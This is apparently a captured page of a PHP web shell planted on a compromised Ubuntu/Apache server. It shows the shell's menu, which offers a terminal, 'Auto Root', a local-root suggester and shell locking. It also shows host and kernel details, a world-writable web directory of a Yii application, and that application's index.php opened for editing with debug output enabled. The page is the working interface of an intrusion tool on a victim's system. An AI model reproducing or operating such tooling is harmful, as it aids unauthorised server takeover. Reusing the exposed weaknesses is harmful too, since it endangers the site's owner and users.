Linux rspmc 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
Server IP : 192.168.20.114 & Your IP : 216.73.216.34
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Lock Shell
Lock File++
Readme
/
var /
www /
html /
develope-latihan /
Delete
Unzip
Name
Size
Permission
Date
Action
.git
[ DIR ]
drwxrwxrwx
2024-08-23 00:04
assets
[ DIR ]
drwxrwxrwx
2025-02-11 16:52
autodeploycicd
[ DIR ]
drwxr-xr-x
2023-06-06 10:44
bin
[ DIR ]
drwxrwxrwx
2023-03-08 16:57
css
[ DIR ]
drwxrwxrwx
2021-09-11 22:51
data
[ DIR ]
drwxrwxrwx
2021-09-12 08:09
data_old
[ DIR ]
drwxrwxrwx
2021-09-11 22:51
images
[ DIR ]
drwxrwxrwx
2023-02-15 15:11
images_old
[ DIR ]
drwxrwxrwx
2021-09-11 22:51
js
[ DIR ]
drwxrwxrwx
2021-09-11 22:51
php
[ DIR ]
drwxrwxrwx
2021-09-11 22:51
protected
[ DIR ]
drwxrwxrwx
2021-09-11 23:09
themes
[ DIR ]
drwxrwxrwx
2021-09-12 08:09
themes_old
[ DIR ]
drwxrwxrwx
2021-09-11 22:51
uploads
[ DIR ]
drwxrwxrwx
2023-08-28 13:31
vendor
[ DIR ]
drwxrwxrwx
2023-03-08 17:12
yii1_10
[ DIR ]
drwxrwxrwx
2021-09-11 22:51
.gitignore
71
B
-rwxrwxrwx
2021-09-11 22:51
.htaccess
226
B
-rwxrwxrwx
2021-09-11 22:51
README.md
1.64
KB
-rwxrwxrwx
2021-09-11 22:51
bitbucket-pipelines.yml
544
B
-rwxrwxrwx
2023-06-06 10:43
composer.json
224
B
-rwxrwxrwx
2023-03-08 17:12
composer.lock
17.53
KB
-rwxrwxrwx
2023-03-08 17:12
composer.phar
1.88
MB
-rwxrwxrwx
2021-09-11 22:51
contributors.txt
1.64
KB
-rwxrwxrwx
2021-09-11 22:51
cron.php
628
B
-rwxrwxrwx
2021-09-11 22:51
index-test.php
468
B
-rwxrwxrwx
2021-09-11 22:51
index.php
1.28
KB
-rwxrwxrwx
2023-03-08 16:32
Save
Rename
<?php ini_set('memory_limit', '-1'); ini_set('display_errors','1'); ini_set('display_startup_errors', '1'); ini_set('html_errors', '1'); //error_reporting(0); //UNTUK PRODUKSI error_reporting(E_ALL | E_STRICT); //UNTUK DEVELOPMENT // change the following paths if necessary //$yii=dirname(__FILE__).'/yii1_10/framework/yiilite.php'; //UNTUK PRODUKSI $yii=dirname(__FILE__).'/yii1_10/framework/yii.php'; //UNTUK DEVELOPMENT $config=dirname(__FILE__).'/protected/config/main.php'; // remove the following lines when in production mode //defined('YII_DEBUG') or define('YII_DEBUG',false); //UNTUK PRODUKSI defined('YII_DEBUG') or define('YII_DEBUG',true); //UNTUK DEVELOPMENT // specify how many levels of call stack should be shown in each log message defined('YII_TRACE_LEVEL') or define('YII_TRACE_LEVEL',3); require_once($yii); Yii::createWebApplication($config)->run(); if(isset($_GET['r'])) { $url = $_GET['r']; if(isset(Yii::app()->user->id)){ $attributes = array( 'statuslogin' => TRUE, 'ruanganaktifitas' => Yii::app()->user->getState('ruangan_id'), 'crudaktifitas' => $url, 'waktuterakhiraktifitas' => date("Y-m-d H:i:s"), ); $update = LoginpemakaiK::model()->updateByPk(Yii::app()->user->id, $attributes); } }